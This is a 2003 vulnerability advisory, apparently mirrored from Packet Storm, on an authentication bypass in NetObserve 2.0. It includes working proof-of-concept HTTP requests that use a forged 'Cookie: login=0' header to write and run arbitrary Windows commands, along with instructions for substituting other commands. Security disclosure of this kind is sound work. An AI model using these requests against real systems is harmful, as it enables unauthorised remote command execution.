Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

netobserve.txt

🗓️ 31 Dec 2003 00:00:00Reported by Peter Winter-SmithType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 41 Views

NetObserve has a highly critical security bypass allowing remote system commands via unauthorized access.

Code
`NetObserve Security Bypass Vulnerability  
  
########################################  
  
Credit:  
Author : Peter Winter-Smith  
  
Software:  
Packages : NetObserve  
Version : 2.0 and prior  
Vendor : ExploreAnywhere Software  
Vendor Url : http://www.exploreanywhere.com/no-intro.php  
  
Vulnerability:  
Bug Type : Security Bypass  
Severity : Highly Critical  
+ Remote System Command Via NetObserve  
  
  
1. Description of Software  
  
"NETObserve is your all in one solution to monitoring spouses, co-workers,  
children, employee's and just about any other person you may concerned of  
that is using your PC! NETObserve will monitor not only what is going on  
within your PC, but it can also record what is going on in front of your  
PC, through the use of our breakthrough web cam surveillance technology!  
With NETObserve on your side, you will have remote, realtime access to  
your PC, allowing you to remotely control and monitor a PC while you are  
away! Read on to find out why NETObserve is leading the way in the cutting  
edge industry of PC monitoring, surveillance, and administration!"  
- Vendor's Description  
  
  
2. Bug Information  
  
(a). Security Bypass  
  
NetObserve is extremely persistant when trying to ensure that any remote  
user issuing commands to the server is properly authenticated. It seems  
that even if the remote administrator closes his or her browser they are  
required to login again before they can gain control of the remote system.  
  
Once a legitimate session with an administrator has been established, the  
browser confirms that the commands which the remote user is issuing are  
allowed to be performed on the remote system by sending a special HTTP  
header to the NetObserve server.  
  
The only problem with this is the fact that any remote user can attach the  
special header directly to their own specially crafted request, and  
NetObserve blindly believes that a session with an administrator was  
already in progress.  
  
The special header in question is nothing more than 'Cookie: login=0'!  
  
  
3. Proof of Concept Code  
  
The following two HTTP requests will execute commands via the windows  
command interpreter on the remote system:  
  
REQUEST #1:  
  
--------------------------------------------------------------------------  
POST /sendeditfile HTTP/1.1  
Accept: */*  
Referer: http://127.0.0.1/editfile=?C:\WINDOWS\win.bat?  
Content-Type: application/x-www-form-urlencoded  
Host: AnyHostWillDo  
Content-Length: 25  
Cookie: login=0  
  
newfiledata=cmd+%2Fc+calc  
--------------------------------------------------------------------------  
  
REQUEST #2:  
  
--------------------------------------------------------------------------  
GET /runfile=?C:\windows\win.bat? HTTP/1.1  
Accept: */*  
Host: AnyHostWillDo  
Cookie: login=0  
  
  
--------------------------------------------------------------------------  
  
To change the commands to be run, just alter the 'Content-Length' of the  
first request to be the length of the line of commands, including the  
string 'newfiledata='.  
Then alter the data being posted under 'newfiledata', remembering to  
replace spaces with '+' and encode any common HTTP characters, like '/'  
as hexadecimal values, '%2F' in this instance.  
  
These specific requests sent unaltered will execute the windows  
calculator.  
  
  
4. Patches - Workarounds  
  
No fixes are available at the time of writing. It it suggested that you  
use a different, more secure remote administration software package until  
a patch is released.  
  
  
5. Credits  
  
The discovery, analysis and exploitation of this flaw is a result of  
research carried out by Peter Winter-Smith. I would ask that you do not  
regard any of the analysis to be 'set in stone', and that if investigating  
this flaw you back trace the steps detailed earlier for yourself.  
  
Greets and thanks to:  
David and Mark Litchfield, JJ Gray (Nexus), Todd and all the  
packetstorm crew, Luigi Auriemma, Bahaa Naamneh, sean(gilbert(perlboy)),  
pv8man, nick k., Joel J. and Martine.  
  
  
o This document should be mirrored at:  
- http://www.elitehaven.net/netobserve.txt`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
31 Dec 2003 00:00Current
7.4High risk
Vulners AI Score7.4
netobservesecurity bypassremote system commandhighly criticalpeter winter-smithexploreanywhere software.
41